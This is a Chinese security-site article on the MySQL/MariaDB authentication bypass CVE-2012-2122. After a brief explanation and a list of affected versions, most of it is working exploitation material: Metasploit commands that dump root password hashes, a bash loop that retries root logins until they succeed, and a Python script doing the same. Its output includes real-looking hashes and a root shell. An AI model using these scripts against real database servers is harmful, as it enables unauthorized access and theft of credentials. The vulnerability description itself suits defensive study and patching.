首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Mysql身份认证漏洞及利用(CVE-2012-2122)
来源:http://www.freebuf.com 作者:cs24 发布时间:2012-06-12  

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。

受影响的产品:
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

网上已经出了metasploit版本的相应利用工具,下载地址

利用方法如下:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf  auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf  auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf  auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

测试方法2:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

测试方法3:

#!/usr/bin/python
import subprocess

while 1:
        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()

如下:

relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost (using password: YES)
ERROR 1045 (28000): Access denied for user root’@'localhost’ (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

原文地址


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·PostgreSQL基于错误XML外部实体
·Thinkphp框架动态执行漏洞
·Dedecms 注射漏洞获得管理员密码
·structs2 远程命令执行漏洞分析
·SHOPEX 4.8.5 注入漏洞以及后台
·织梦cms v6.7最新上传漏洞
·Velocity Parse()函数引发的本地
·DeDeCMS v5.7最新ajax_membergro
·phpcms v9注入漏洞
·Discuz7.X通杀0day(UCenter Home
·phpcms 2008多个漏洞 (可getshel
·SAE云服务安全沙箱绕过
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved